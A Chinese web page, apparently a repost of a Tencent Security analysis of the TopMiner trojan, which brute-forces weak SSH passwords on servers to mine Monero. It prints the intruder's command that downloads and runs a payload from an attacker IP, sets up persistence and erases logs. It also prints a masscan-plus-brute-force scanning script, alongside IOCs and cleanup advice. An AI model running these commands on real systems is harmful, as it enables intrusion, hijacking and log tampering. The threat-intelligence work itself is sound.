当前位置:首页 > 网站入侵 > 正文内容

腾讯主机安全截获 TOPMiner 挖矿木马,受害服务器约 1.5 万台,作者称“ 12 小时扫描全球”

访客56年前 (1970-01-01)网站入侵1022

一、概述

腾讯主机安全(云镜)检测到挖矿木马TopMiner近期攻击十分活跃,该木马通过SSH弱口令爆破进行攻击入侵,会清除竞品挖矿木马,同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算,约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top,腾讯安全将其命名为TopMiner挖矿木马。

TopMiner挖矿团伙针对SSH弱口令进行爆破攻击,成功后执行命令下载恶意shell脚本,并将启动脚本写入crontab定时任务进行持久化,shell脚本继续下载挖矿木马nginx、top启动挖矿。

木马入侵系统后,还会下载SSH爆破程序sshd,扫描到 *** 中开放22端口的Linux系统机器后,通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释:”宽带充足基本可以12个小时扫描全球”,气焰可谓十分嚣张。
分析过程中,我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。

腾讯云主机安全(云镜)支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警,通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险,具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。

自查处置建议

腾讯安全专家建议企业安全运维人员对服务器进行检查,清理以下相关项:

文件和进程:
/tmp/.top-unix/nginx
/tmp/.ICE-unix1/top
/srv/.ICE-unix1/sshd
/srv/.ICE-unix1/scan.sh
/etc/ipv6_addrconf
/etc/crypto

Crontab定时任务:
/tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X

/tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X
/etc/crypto

腾讯安全响应清单

腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截:

应用
场景 安全产品 解决方案

腾讯T-Sec

威胁情报云查服务

(SaaS)

1)TopMiner挖矿团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)TopMiner挖矿团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生

安全

防护

云防火墙

(Cloud Firewall,CFW)

基于 *** 流量进行威胁检测与主动拦截,已支持:

1)TopMiner木马关联的IOCs已支持识别检测;

2)检测SSH弱口令爆破攻击。

有关云防火墙的更多信息,可参考:
 https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

(Cloud Workload Protection,CWP)

1)已支持查杀TopMiner木马程序;

2)主动检测系统是否存在SSH弱口令并提示;

3)检测SSH弱口令爆破攻击。

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护 腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持通过协议检测TopMiner木马与服务器的 *** 通信。

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

二、详细分析

2.1、攻击入侵方式

病毒通过SSH弱口令爆破入侵系统,随后执行恶意命令下载脚本crypto,并将其写入crontab定时任务。

bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c

crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在,如果不存在会判断是否有竞品挖矿木马存在,然后会杀掉竞品挖矿木马进程kswapd0、rsync、t *** 、work32、work64、go、joseph,然后从C2服务器下载挖矿木马top并启动挖矿。

Top挖矿木马下载地址为:http[:]//xiazai.qq360bidu.me:808/top

挖矿使用矿池:91.121.140.167:443

挖矿使用钱包:
43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

根据其矿池算力平均340KH/s,可推算该挖矿团伙已控制约1.5万台服务器进行挖矿,平均每天获利约154美元(0.17个门罗币),折合人民币约1000元。


2.2、横向移动

木马入侵系统后会接着下载端 *** 破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间,除了爆破程序sshd和用户名列表user.txt是6月份被修改过(可能是初次创建),其他文件操作时间均为12月,并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后,攻击模块一直处于活跃状态,并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址: 爆破用户名:root,其中一个密码字典有1700余个密码,部分如下: 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd,脚本代码如下:

#!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4

在实际攻击过程中,针对22端口进行爆破,爆破线程被设置为1000。

./sshd ips.txt user.txt password.txt 22 1000

2.3、该团伙使用的其他木马

除了shell脚本、挖矿木马、爆破程序之外,我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马,以及backdoor木马cnet2。

挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译,其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。

backdoor木马“cnet2”,具有监听端口,连接服务端,下载文件,执行远程命令等功能。

Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写,具有DDoS攻击、远程shell以及SSH爆破攻击等功能,详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。

IOCs

IP
103.45.183.12(ZoomEye搜索结果)

Domain
xiazai.qq360bidu.me

URL
http[:]//xiazai.qq360bidu.me:808/top
http[:]//103.45.183.12:808/crypto

MD5

amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29

钱包:
42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN

43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

阅读剩余的69%

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/32640.html

返回列表

没有更早的文章了...

下一篇:如何找回qq密码(手机号也停用了)

“腾讯主机安全截获 TOPMiner 挖矿木马,受害服务器约 1.5 万台,作者称“ 12 小时扫描全球”” 的相关文章

哥斯达黎加政府部分网络系统因遭黑客攻击 仍处于关闭状态

截至当地时间4月22日,因遭到国际黑客攻击,哥斯达黎加部分政府公共服务网络仍处于关闭状态。哥斯达黎加总统阿尔瓦拉多此前一天对此表示谴责。他表示,哥斯达黎加不会向国际黑客组织妥协,目前有关部门正在加紧网络管理技术升级,加固网络安全,同时评估泄漏数据的规模和损失,与国际组织和公司合作,加紧恢复受损系统。...

“Hack DHS”漏洞猎人在国土安全部系统中发现 122 个安全漏洞

据美国国土安全部(DHS)近日透露,加入“Hack DHS”漏洞赏金项目(bug bounty program)的赏金猎人已经在国土安全部的外部系统中发现了122个安全漏洞,其中27个被评估为严重漏洞。 据悉,国土安全部已向450多名经审查的安全研究人员和道德黑客发放了总计125,600美元的奖金...

乌克兰安全局关闭了五个在公民中传播恐慌和错误信息的机器人农场

据Techspot报道,乌克兰国家安全局(SBU)宣布,自俄罗斯入侵该国以来,该机构已发现并关闭了5个运营10万个社交媒体账户的机器人农场,这些账户传播与入侵有关的假新闻。 SBU在一份新闻稿中写道,这些农场位于包括哈尔科夫、切尔卡瑟、捷尔诺皮尔和外喀尔巴阡在内的地区,被用于 “大规模信息破坏”,...

NVIDIA 拒绝支付赎金后 威胁者利用代码签署恶意软件 可在 Windows 中加载

利用窃取过来的 NVIDIA 代码,威胁者利用签名证书来签署恶意软件,使其看起来值得信赖,并允许在 Windows 中加载恶意驱动程序。本周,NVIDIA 公司证实,他们遭受了一次网络攻击,使威胁者得以窃取员工的证书和专有数据。 对本次泄露事件负责的勒索集团 Lapsus$ 表示,他们已经窃取了...

DLL 反制:安全研究人员提出阻止勒索软件加密文件的新策略

尽管恶意软件开发者擅长利用各种软硬件漏洞来达成目的,但他们散播的成品也并非毫无破绽。比如近日,安全研究人员 John Page(又名 hyp3rlinx)就介绍了一招反制勒索软件的新套路。由个人网站和 Twitter 账号上发布的内容可知,John Page 专精于找到恶意软件本身的漏洞,并于近日分...

可口可乐 161GB 数据被盗 包括金融数据、密码和商业账户等

俄罗斯关联的黑客组织 Stormous 声称已成功入侵可口可乐公司,并公开售卖大量数据。Stormous 表示窃取了 161GB 的财务数据、密码和账户,然后以 644 万美元或 1600 万个比特币的价格出售这些数据。 Stormous 在宣布成功入侵之前,曾在 Telegram 上发起投票,询...

评论列表

萌懂假欢
3年前 (2022-06-26)

81MaJUmMUXYz2ZZXFXN43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ4

丑味未芩
3年前 (2022-06-26)

、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。腾讯云主机安全(云镜)支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警,通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险,具有很强的实战性。腾讯安全专家建

孤央俛就
3年前 (2022-06-26)

维人员对服务器进行检查,清理以下相关项:文件和进程:/tmp/.top-unix/nginx/tmp/.ICE-unix1/top/srv/.ICE-unix1/sshd/srv/.ICE-unix1/scan.sh/etc/ipv6_ad

孤央叹倦
3年前 (2022-06-26)

,气焰可谓十分嚣张。分析过程中,我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。